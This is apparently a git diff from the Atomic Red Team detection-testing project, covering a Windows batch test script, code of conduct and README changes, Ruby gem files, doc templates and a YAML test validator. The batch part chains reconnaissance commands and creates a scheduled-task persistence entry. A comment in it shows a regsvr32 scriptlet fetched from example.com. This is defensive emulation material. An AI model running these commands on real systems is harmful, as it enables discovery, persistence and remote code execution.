HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser
:: Step 3. We will setup some persistence by creating a scheduled task. T1053
:: Alternate Ending : SCHTASKS /Create /SC ONCE /TN spawn /TR "regsvr32.exe /s /u /i:https://example.com/a.sct scrobj.dll" /ST 20:10
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
:: We will also just go ahead and clean up the task.
SCHTASKS /Delete /TN Spawn /F
@@ -8,7 +8,7 @@ net config workstation
net accounts
net accounts /domain
net view
sc.exe query
sc query
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+1
View File
@@ -0,0 +1 @@
Downloaded Remote Content
+22 -38
View File
@@ -1,58 +1,42 @@
# Contributor Code of Conduct
# Contributor Covenant Code of Conduct
Welcome to the [Atomic Red Team online community](https://atomicredteam.io/). Our goal is to foster an open, safe, and welcoming environment. As a collective, we—as contributors, maintainers, and the Open Source Projects team of Red Canary—pledge to encourage our project and community to be a harassment-free space. We invite you to collaborate, exchange thoughts or information, and engage with one another. Atomic Red Team is meant for everyone, regardless of age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation.
## Our Pledge
## Our Guidelines
In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
### Acceptable Behavior
## Our Standards
* Using welcoming and inclusive language. Some people [use different pronouns](https://www.npr.org/2021/06/02/996319297/gender-identity-pronouns-expression-guide-lgbtq)— please respect all pronouns.
Examples of behavior that contributes to creating a positive environment include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community and what supports engagement
* Showing compassion and understanding towards other community members
* Focusing on what is best for the community
* Showing empathy towards other community members
### Unacceptable Behavior
Examples of unacceptable behavior by participants include:
* Unacceptable behaviors include: [intimidating, harassive, abusive, discriminatory, derogatory or demeaning conduct](https://www.doi.gov/employees/anti-harassment/definitions) by any one in the community
* Harassment includes: offensive verbal comments related to (but not limited to) age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation, or other protected category; inappropriate deliberate intimidation, stalking or following; inappropriate direct messages, and unwelcome sexual attention, imagery, or language
* Written, verbal or other abuse, [trolling](https://dictionary.cambridge.org/us/dictionary/english/trolling), intimidation, threats, annoyance, harassment, stalking, and/or spamming against any person, which in any way creates a disturbance that is disruptive or dangerous, or creates apprehension in a person
* Harassing individuals in a public or private form.
* Publishing others' private information, such as a physical or email address, without explicit permission
* Other conduct that could reasonably be considered inappropriate in a professional setting
* The use of sexualized language or imagery and unwelcome sexual attention or advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a professional setting
## Reporting
## Our Responsibilities
If you see anything that you believe breaks our community guidelines, no matter whether it is witnessed privately or publicly, please reach out to the **Red Canary Open Source Team** at [email](mailto:opensource@redcanary.com) with screenshots of the post/text and a link to the post or comments.
Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
## Enforcement & Consequences
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the Community Manager. Unacceptable behavior will not be tolerated by community members, maintainers, and Red Canary team members. The Atomic Red Team Community Manager and maintainers will review and investigate all complaints.
Anyone asked to stop unacceptable behavior is expected to comply immediately. If an Atomic Red Team community member (anyone contributing to our [GitHub Repo](https://github.com/redcanaryco/atomic-red-team) or [Community Slack](https://atomicredteam.io/slack)) engages in unacceptable behavior, the Community Manager may take any temporary or permanent action they deem appropriate, up to and including immediate expulsion from the Atomic Red Team community without warning.
Atomic Red Team maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
## Managers & Maintainers Responsibilities
Atomic Red Team Community Managers are responsible for upholding the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
Atomic Red Team Maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or that they otherwise deem inappropriate, threatening, offensive, or harmful.
Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
## Scope
This Code of Conduct applies to all of the Atomic Red Team, and “Atomic Family,” project spaces, including public spaces where an individual is representing the project or its community. Examples of representing the project or community include using an official project e-mail address, posting an official social media account, or acting as an appointed representative at an online or offline event.
This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
* [Atomic Red Team Website](https://atomicredteam.io/)
## Enforcement
* [Atomic Red Team Slack](https://atomicredteam.io/slack)
Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at research at redcanary.com. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
* [Atomic Red Team GitHub](https://github.com/redcanaryco/atomic-red-team)
* **Atomic Family**
* [Invoke-AtomicRedTeam](https://github.com/redcanaryco/invoke-atomicredteam)
* [AtomicTestHarnesses](https://github.com/redcanaryco/atomictestharnesses)
* [Chain Reactor](https://github.com/redcanaryco/chain-reactor)
Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
## Attribution
+2
View File
@@ -0,0 +1,2 @@
source "https://rubygems.org"
gemspec
+254
View File
@@ -0,0 +1,254 @@
PATH
remote: .
specs:
atomic-red-team (1.0)
GEM
remote: https://rubygems.org/
specs:
activesupport (4.2.10)
i18n (~> 0.7)
minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1)
addressable (2.5.2)
public_suffix (>= 2.0.2, < 4.0)
coffee-script (2.4.1)
coffee-script-source
execjs
coffee-script-source (1.11.1)
colorator (1.1.0)
commonmarker (0.17.13)
ruby-enum (~> 0.5)
concurrent-ruby (1.1.4)
dnsruby (1.61.2)
addressable (~> 2.5)
em-websocket (0.5.1)
eventmachine (>= 0.12.9)
http_parser.rb (~> 0.6.0)
ethon (0.12.0)
ffi (>= 1.3.0)
eventmachine (1.2.7)
execjs (2.7.0)
faraday (0.15.4)
multipart-post (>= 1.2, < 3)
ffi (1.10.0)
forwardable-extended (2.6.0)
gemoji (3.0.0)
github-pages (193)
activesupport (= 4.2.10)
github-pages-health-check (= 1.8.1)
jekyll (= 3.7.4)
jekyll-avatar (= 0.6.0)
jekyll-coffeescript (= 1.1.1)
jekyll-commonmark-ghpages (= 0.1.5)
jekyll-default-layout (= 0.1.4)
jekyll-feed (= 0.11.0)
jekyll-gist (= 1.5.0)
jekyll-github-metadata (= 2.9.4)
jekyll-mentions (= 1.4.1)
jekyll-optional-front-matter (= 0.3.0)
jekyll-paginate (= 1.1.0)
jekyll-readme-index (= 0.2.0)
jekyll-redirect-from (= 0.14.0)
jekyll-relative-links (= 0.5.3)
jekyll-remote-theme (= 0.3.1)
jekyll-sass-converter (= 1.5.2)
jekyll-seo-tag (= 2.5.0)
jekyll-sitemap (= 1.2.0)
jekyll-swiss (= 0.4.0)
jekyll-theme-architect (= 0.1.1)
jekyll-theme-cayman (= 0.1.1)
jekyll-theme-dinky (= 0.1.1)
jekyll-theme-hacker (= 0.1.1)
jekyll-theme-leap-day (= 0.1.1)
jekyll-theme-merlot (= 0.1.1)
jekyll-theme-midnight (= 0.1.1)
jekyll-theme-minimal (= 0.1.1)
jekyll-theme-modernist (= 0.1.1)
jekyll-theme-primer (= 0.5.3)
jekyll-theme-slate (= 0.1.1)
jekyll-theme-tactile (= 0.1.1)
jekyll-theme-time-machine (= 0.1.1)
jekyll-titles-from-headings (= 0.5.1)
jemoji (= 0.10.1)
kramdown (= 1.17.0)
liquid (= 4.0.0)
listen (= 3.1.5)
mercenary (~> 0.3)
minima (= 2.5.0)
nokogiri (>= 1.8.2, < 2.0)
rouge (= 2.2.1)
terminal-table (~> 1.4)
github-pages-health-check (1.8.1)
addressable (~> 2.3)
dnsruby (~> 1.60)
octokit (~> 4.0)
public_suffix (~> 2.0)
typhoeus (~> 1.3)
html-pipeline (2.10.0)
activesupport (>= 2)
nokogiri (>= 1.4)
http_parser.rb (0.6.0)
i18n (0.9.5)
concurrent-ruby (~> 1.0)
jekyll (3.7.4)
addressable (~> 2.4)
colorator (~> 1.0)
em-websocket (~> 0.5)
i18n (~> 0.7)
jekyll-sass-converter (~> 1.0)
jekyll-watch (~> 2.0)
kramdown (~> 1.14)
liquid (~> 4.0)
mercenary (~> 0.3.3)
pathutil (~> 0.9)
rouge (>= 1.7, < 4)
safe_yaml (~> 1.0)
jekyll-avatar (0.6.0)
jekyll (~> 3.0)
jekyll-coffeescript (1.1.1)
coffee-script (~> 2.2)
coffee-script-source (~> 1.11.1)
jekyll-commonmark (1.2.0)
commonmarker (~> 0.14)
jekyll (>= 3.0, < 4.0)
jekyll-commonmark-ghpages (0.1.5)
commonmarker (~> 0.17.6)
jekyll-commonmark (~> 1)
rouge (~> 2)
jekyll-default-layout (0.1.4)
jekyll (~> 3.0)
jekyll-feed (0.11.0)
jekyll (~> 3.3)
jekyll-gist (1.5.0)
octokit (~> 4.2)
jekyll-github-metadata (2.9.4)
jekyll (~> 3.1)
octokit (~> 4.0, != 4.4.0)
jekyll-mentions (1.4.1)
html-pipeline (~> 2.3)
jekyll (~> 3.0)
jekyll-optional-front-matter (0.3.0)
jekyll (~> 3.0)
jekyll-paginate (1.1.0)
jekyll-readme-index (0.2.0)
jekyll (~> 3.0)
jekyll-redirect-from (0.14.0)
jekyll (~> 3.3)
jekyll-relative-links (0.5.3)
jekyll (~> 3.3)
jekyll-remote-theme (0.3.1)
jekyll (~> 3.5)
rubyzip (>= 1.2.1, < 3.0)
jekyll-sass-converter (1.5.2)
sass (~> 3.4)
jekyll-seo-tag (2.5.0)
jekyll (~> 3.3)
jekyll-sitemap (1.2.0)
jekyll (~> 3.3)
jekyll-swiss (0.4.0)
jekyll-theme-architect (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-cayman (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-dinky (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-hacker (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-leap-day (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-merlot (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-midnight (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-minimal (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-modernist (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-primer (0.5.3)
jekyll (~> 3.5)
jekyll-github-metadata (~> 2.9)
jekyll-seo-tag (~> 2.0)
jekyll-theme-slate (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-tactile (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-theme-time-machine (0.1.1)
jekyll (~> 3.5)
jekyll-seo-tag (~> 2.0)
jekyll-titles-from-headings (0.5.1)
jekyll (~> 3.3)
jekyll-watch (2.1.2)
listen (~> 3.0)
jemoji (0.10.1)
gemoji (~> 3.0)
html-pipeline (~> 2.2)
jekyll (~> 3.0)
kramdown (1.17.0)
liquid (4.0.0)
listen (3.1.5)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
ruby_dep (~> 1.2)
mercenary (0.3.6)
mini_portile2 (2.4.0)
minima (2.5.0)
jekyll (~> 3.5)
jekyll-feed (~> 0.9)
jekyll-seo-tag (~> 2.1)
minitest (5.11.3)
multipart-post (2.0.0)
nokogiri (1.10.1)
mini_portile2 (~> 2.4.0)
octokit (4.13.0)
sawyer (~> 0.8.0, >= 0.5.3)
pathutil (0.16.2)
forwardable-extended (~> 2.6)
public_suffix (2.0.5)
rb-fsevent (0.10.3)
rb-inotify (0.10.0)
ffi (~> 1.0)
rouge (2.2.1)
ruby-enum (0.7.2)
i18n
ruby_dep (1.5.0)
rubyzip (1.2.2)
safe_yaml (1.0.4)
sass (3.7.3)
sass-listen (~> 4.0.0)
sass-listen (4.0.0)
rb-fsevent (~> 0.9, >= 0.9.4)
rb-inotify (~> 0.9, >= 0.9.7)
sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0)
terminal-table (1.8.0)
unicode-display_width (~> 1.1, >= 1.1.1)
thread_safe (0.3.6)
typhoeus (1.3.1)
ethon (>= 0.9.0)
tzinfo (1.2.5)
thread_safe (~> 0.1)
unicode-display_width (1.4.1)
PLATFORMS
ruby
DEPENDENCIES
atomic-red-team!
github-pages
BUNDLED WITH
1.16.1
+44 -28
View File
@@ -1,45 +1,61 @@
<p><img src="https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png" width="150px" /></p>
# Atomic Red Team
[![CircleCI](https://circleci.com/gh/redcanaryco/atomic-red-team.svg?style=svg)](https://circleci.com/gh/redcanaryco/atomic-red-team)
![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1790-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
Atomic Red Team allows every security team to test their controls by executing simple
"atomic tests" that exercise the same techniques used by adversaries (all mapped to
[Mitre's ATT&CK](https://attack.mitre.org/wiki/Main_Page)).
## Philosophy
Atomic Red Team is a library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
Atomic Red Team to quickly, portably, and reproducibly test their environments.
Atomic Red Team is a library of simple tests that every security team can execute to test their controls. Tests are
focused, have few dependencies, and are defined in a structured format that can be used by automation frameworks.
## Get started
Three key beliefs made up the Atomic Red Team charter:
- **Teams need to be able to test everything from specific technical controls to outcomes.**
Our security teams do not want to operate with a “hopes and prayers” attitude toward detection. We need to know
what our controls and program can detect, and what it cannot. We don't have to detect every adversary, but we
do believe in knowing our blind spots.
You can execute atomic tests directly from the command line, no installation
required. See the [Getting started](https://github.com/redcanaryco/atomic-red-team/wiki/Getting-Started)
page of our wiki.
- **We should be able to run a test in less than five minutes.**
Most security tests and automation tools take a tremendous amount of time to install, configure, and execute.
We coined the term "atomic tests" because we felt there was a simple way to decompose tests so most could be
run in a few minutes.
For a more robust testing experience, consider using an execution framework like
[Invoke-Atomic](https://github.com/redcanaryco/invoke-atomicredteam).
The best test is the one you actually run.
## Learn more
- **We need to keep learning how adversaries are operating.**
Most security teams don't have the benefit of seeing a wide variety of adversary types and techniques crossing
their desk every day. Even we at Red Canary only come across a fraction of the possible techniques being used,
which makes the community working together essential to making us all better.
The Atomic Red Team documentation is available as a [wiki](https://github.com/redcanaryco/atomic-red-team/wiki/).
See: https://atomicredteam.io
For information about the philosophy and development of Atomic Red Team, visit
our website at <https://atomicredteam.io>.
## Having trouble?
To stay up to date on all things Atomic Red Team, sign up for the Atomic Newsletter: https://redcanary.com/atomic-newsletter/
Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
## Contribute to Atomic Red Team
## Getting Started
Atomic Red Team is open source and community developed. If you're interested in
becoming a contributor, check out these resources:
* [Getting Started With Atomic Tests](https://atomicredteam.io/testing)
* Peruse the [Complete list of Atomic Tests](atomics/index.md) and the [ATT&CK Matrix](atomics/matrix.md)
- Windows [Tests](atomics/windows-index.md) and [Matrix](atomics/windows-matrix.md)
- macOS [Tests](atomics/macos-index.md) and [Matrix](atomics/macos-matrix.md)
- Linux [Tests](atomics/linux-index.md) and [Matrix](atomics/linux-matrix.md)
* [Fork](https://github.com/redcanaryco/atomic-red-team/fork) and [Contribute](https://atomicredteam.io/contributing) your own modifications
* [Doing more with Atomic Red Team](#doing-more-with-atomic-red-team)
* [Using the Atomic Red Team Ruby API](#using-the-atomic-red-team-ruby-api)
* [Bonus APIs: Ruby ATT&CK API](#bonus-apis-ruby-attck-api)
* [Execution Frameworks](https://github.com/redcanaryco/atomic-red-team/blob/master/execution-frameworks)
* Have questions? Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com)
* Need a Slack invitation? Grab one at [https://slack.atomicredteam.io/](https://slack.atomicredteam.io/)
- Join our [Slack workspace](https://atomicredteam.io/slack) and get involved
with the community. Don't forget to review the [code of conduct](CODE_OF_CONDUCT.md)
before you join.
- Report bugs and request new features by [submitting an issue](https://github.com/redcanaryco/atomic-red-team/issues/new/choose).
- Read our [contribution guide](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
for more information about contributing directly to this repository.
- Check the [license](LICENSE.txt) for information regarding the distribution
and modification of Atomic Red Team.
- Contribute to linux atomics quickly from GitHub Codespaces. For more details, click [here](https://github.com/redcanaryco/atomic-red-team/wiki/Github-Codespaces)
## Code of Conduct
[![Open in GitHub Codespaces](https://github.com/codespaces/badge.svg)](https://codespaces.new/redcanaryco/atomic-red-team)
In order to have a more open and welcoming community, Atomic Red Team adheres to a
[code of conduct](CODE_OF_CONDUCT.md).
## License
See the [LICENSE](https://github.com/redcanaryco/atomic-red-team/blob/master/LICENSE.txt) file.
+15
View File
@@ -0,0 +1,15 @@
# Describe your gem and declare its dependencies:
# Packages the Atomic Red Team library (atomic_red_team/), docs, and bin/
# scripts as a gem so CI can install the doc-generation toolchain via Bundler.
Gem::Specification.new do |s|
  s.name = 'atomic-red-team'
  s.version = '1.0'
  s.authors = ['Red Canary', 'Casey Smith', 'Mike Haag']
  s.email = ['it@redcanary.com', 'casey.smith@redcanary.com', 'mike.haag@redcanary.com']
  s.summary = 'Small, highly portable, community developed detection tests mapped to ATT&CK.'
  s.license = "MIT"
  s.homepage = "https://redcanary.com/atomic-red-team"
  # Ship the gemspec itself plus library code, top-level markdown, and executables.
  s.files = %w(atomic-red-team.gemspec) + Dir['{atomic_red_team}/**/*', '*.md', 'bin/*']
  s.test_files = Dir['spec/**/*']
  s.require_paths = %w(atomic_red_team)
  # github-pages pins the Jekyll toolchain used to render the docs site.
  s.add_development_dependency 'github-pages'
end
View File
@@ -0,0 +1,49 @@
# <%= technique['identifier'] %> - <%= technique['name'] -%>
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/<%= technique['identifier'] %>)
<blockquote><%= technique['description'] %></blockquote>
## Atomic Tests
<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
<% title = "Atomic Test ##{test_number+1} - #{test['name']}" %>
- [<%= title %>](#<%= title.downcase.gsub(/ /, '-').gsub(/[`~!@#$%^&*()+=<>?,.\/:;"'|{}\[\]\\–—]/, '') %>)
<% end %>
<% atomic_yaml['atomic_tests'].each_with_index do |test, test_number| -%>
<br/>
## Atomic Test #<%= test_number+1 %> - <%= test['name'] %>
<%= test['description'] -%>
**Supported Platforms:** <%= test['supported_platforms'].collect do |p|
case p
when 'macos'
'macOS'
when 'centos'
'CentOS'
else
p.capitalize
end
end.join(', ') %>
<% if test['input_arguments'].to_a.count > 0 %>
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
<% test['input_arguments'].each do |arg_name, arg_options| -%>
| <%= arg_name %> | <%= arg_options['description'] %> | <%= arg_options['type'] %> | <%= arg_options['default'] %>|
<% end -%>
<% end -%>
<%- if test['executor']['name'] == 'manual' -%>
#### Run it with these steps!
<%= test['executor']['steps'] %>
<%- else -%>
#### Run it with `<%= test['executor']['name'] %>`!
```
<%= test['executor']['command'].to_s.strip %>
```
<%- end -%>
<br/>
<%- end -%>
-75
View File
@@ -1,75 +0,0 @@
# {{ technique['identifier'] }} - {{ technique['name'] }}
## Description from ATT&CK
{% for desc_line in attack_description_lines -%}
> {{ desc_line.strip() }}
{% endfor %}
[Source](https://attack.mitre.org/techniques/{{ technique['identifier'] | attack_url_identifier }})
## Atomic Tests
{% for test in atomic_yaml['atomic_tests'] -%}
{% set title = "Atomic Test #" ~ loop.index ~ ": " ~ test['name'] -%}
- [{{ title }}](#{{ title | anchor }})
{% endfor %}
{% for test in atomic_yaml['atomic_tests'] -%}
### Atomic Test #{{ loop.index }}: {{ test['name'] }}
{{ test['description'].strip() }}
**Supported Platforms:** {{ test['supported_platforms'] | platform_list }}
**auto_generated_guid:** `{{ test['auto_generated_guid'] }}`
{% if test.get('input_arguments') -%}
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
{% for arg_name, arg_options in test['input_arguments'].items() -%}
| {{ arg_name | cleanup }} | {{ arg_options.get('description') | cleanup }} | {{ arg_options.get('type') | cleanup }} | {{ arg_options.get('default') | cleanup }}|
{% endfor -%}
{% endif -%}
{% if test['executor']['name'] == 'manual' -%}
#### Attack Commands: Run it with these steps! {% if test['executor'].get('elevation_required') %} Elevation Required (e.g. root or admin) {% endif %}
{{ test['executor']['steps'] }}
{% else -%}
#### Attack Commands: Run with `{{ test['executor']['name'] }}`!{% if test['executor'].get('elevation_required') %} Elevation Required (e.g. root or admin){% endif %}
```{{ test['executor']['name'] | language }}
{{ test['executor'].get('command', '').strip() }}
```
{% endif %}
{% if test['executor'].get('cleanup_command') is not none -%}
#### Cleanup Commands
```{{ test['executor']['name'] | language }}
{{ test['executor']['cleanup_command'].strip() }}
```
{% endif -%}
{% if test.get('dependencies') -%}
{% set dependency_executor = test.get('dependency_executor_name') or test['executor']['name'] -%}
#### Dependencies: Run with `{{ dependency_executor }}`!
{% for dep in test['dependencies'] %}
##### Description: {{ dep['description'].strip() }}
###### Check Prereq Commands
```{{ dependency_executor | language }}
{{ dep['prereq_command'].strip() }}
```
###### Get Prereq Commands
```{{ dependency_executor | language }}
{{ dep['get_prereq_command'].strip() }}
```
{% endfor %}
{% endif -%}
{% endfor -%}
@@ -0,0 +1 @@
TBD
+173
View File
@@ -0,0 +1,173 @@
require 'yaml'
require 'erb'
require 'attack_api'
class AtomicRedTeam
  ATTACK_API = Attack.new
  ATOMICS_DIRECTORY = "#{File.dirname(File.dirname(__FILE__))}/atomics"

  # TODO- should these all be relative URLs?
  ROOT_GITHUB_URL = "https://github.com/redcanaryco/atomic-red-team"

  #
  # Returns a sorted list of paths that contain Atomic Tests (atomics/T*/T*.yaml)
  #
  def atomic_test_paths
    Dir["#{ATOMICS_DIRECTORY}/T*/T*.yaml"].sort
  end

  #
  # Returns a list of Atomic Tests in Atomic Red Team (as Hashes from source YAML).
  # Each Hash gains an `atomic_yaml_path` key pointing back at its source file.
  # Memoized for the lifetime of this object.
  #
  def atomic_tests
    @atomic_tests ||= atomic_test_paths.collect do |path|
      atomic_yaml = YAML.load(File.read path)
      atomic_yaml['atomic_yaml_path'] = path
      atomic_yaml
    end
  end

  #
  # Returns the individual Atomic Tests for a given identifier, passed as either
  # a string (T1234) or an ATT&CK technique object. Returns [] when no tests exist.
  #
  def atomic_tests_for_technique(technique_or_technique_identifier)
    technique_identifier = if technique_or_technique_identifier.is_a? Hash
      ATTACK_API.technique_identifier_for_technique technique_or_technique_identifier
    else
      technique_or_technique_identifier
    end

    atomic_tests.find do |atomic_yaml|
      atomic_yaml.fetch('attack_technique').upcase == technique_identifier.upcase
    end.to_h.fetch('atomic_tests', [])
  end

  #
  # Returns a Markdown formatted Github link to a technique. This will be to the
  # technique's Markdown file when one exists, or to the contribution guide when
  # no tests exist yet.
  #
  # NOTE(review): `link_new_to_contrib` is currently unused; kept for interface
  # compatibility with existing callers.
  #
  def github_link_to_technique(technique, include_identifier: false, link_new_to_contrib: true)
    technique_identifier = ATTACK_API.technique_identifier_for_technique(technique).upcase
    link_display = "#{"#{technique_identifier.upcase} " if include_identifier}#{technique['name']}"
    if File.exist? "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
      # we have a file for this technique, so link to its Markdown file
      "[#{link_display}](./#{technique_identifier}/#{technique_identifier}.md)"
    else
      # we don't have a file for this technique, so link to the contribution guide
      "#{link_display} [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)"
    end
  end

  #
  # Validates a parsed atomic YAML document against the spec, raising with a
  # descriptive message on the first problem found.
  #
  def validate_atomic_yaml!(yaml)
    raise("YAML file has no elements") if yaml.nil?

    raise('`attack_technique` element is required') unless yaml.has_key?('attack_technique')
    # fixed: message previously said "must be an array" while checking for a String
    raise('`attack_technique` element must be a string') unless yaml['attack_technique'].is_a?(String)

    raise('`display_name` element is required') unless yaml.has_key?('display_name')
    # fixed: message previously said "must be an array" while checking for a String
    raise('`display_name` element must be a string') unless yaml['display_name'].is_a?(String)

    raise('`atomic_tests` element is required') unless yaml.has_key?('atomic_tests')
    raise('`atomic_tests` element must be an array') unless yaml['atomic_tests'].is_a?(Array)
    raise('`atomic_tests` element is empty - you have no tests') unless yaml['atomic_tests'].count > 0

    yaml['atomic_tests'].each_with_index do |atomic, i|
      raise("`atomic_tests[#{i}].name` element is required") unless atomic.has_key?('name')
      raise("`atomic_tests[#{i}].name` element must be a string") unless atomic['name'].is_a?(String)

      raise("`atomic_tests[#{i}].description` element is required") unless atomic.has_key?('description')
      raise("`atomic_tests[#{i}].description` element must be a string") unless atomic['description'].is_a?(String)

      raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms')
      raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array)

      valid_supported_platforms = ['windows', 'centos', 'ubuntu', 'macos', 'linux']
      atomic['supported_platforms'].each do |platform|
        if !valid_supported_platforms.include?(platform)
          raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}")
        end
      end

      (atomic['input_arguments'] || {}).each_with_index do |arg_kvp, iai|
        _arg_name, arg = arg_kvp
        raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element is required") unless arg.has_key?('description')
        raise("`atomic_tests[#{i}].input_arguments[#{iai}].description` element must be a string") unless arg['description'].is_a?(String)
        raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element is required") unless arg.has_key?('type')
        raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element must be a string") unless arg['type'].is_a?(String)
        # fixed: regex now anchored; /[a-z_]+/ matched any string containing one lowercase char
        raise("`atomic_tests[#{i}].input_arguments[#{iai}].type` element must be lowercased and underscored (was #{arg['type']})") unless arg['type'] =~ /\A[a-z_]+\z/

        # TODO: determine if we think default values are required for EVERY input argument
        # raise("`atomic_tests[#{i}].input_arguments[#{iai}].default` element is required") unless arg.has_key?('default')
        # raise("`atomic_tests[#{i}].input_arguments[#{iai}].default` element must be a string (was a #{arg['default'].class.name})") unless arg['default'].is_a?(String)
      end

      raise("`atomic_tests[#{i}].executor` element is required") unless atomic.has_key?('executor')
      executor = atomic['executor']
      raise("`atomic_tests[#{i}].executor.name` element is required") unless executor.has_key?('name')
      raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
      # fixed: anchored for the same reason as the `type` check above
      raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /\A[a-z_]+\z/

      valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual']
      case executor['name']
      when 'manual'
        # manual tests describe steps for a human instead of a command
        raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
        raise("`atomic_tests[#{i}].executor.steps` element must be a string") unless executor['steps'].is_a?(String)
        validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys,
                                       string: executor['steps'],
                                       string_description: "atomic_tests[#{i}].executor.steps"
      when 'command_prompt', 'sh', 'bash', 'powershell'
        raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
        raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
        validate_input_args_vs_string! input_args: (atomic['input_arguments'] || {}).keys,
                                       string: executor['command'],
                                       string_description: "atomic_tests[#{i}].executor.command"
      else
        raise("`atomic_tests[#{i}].executor.name` '#{executor['name']}' must be one of #{valid_executor_types.join(', ')}")
      end

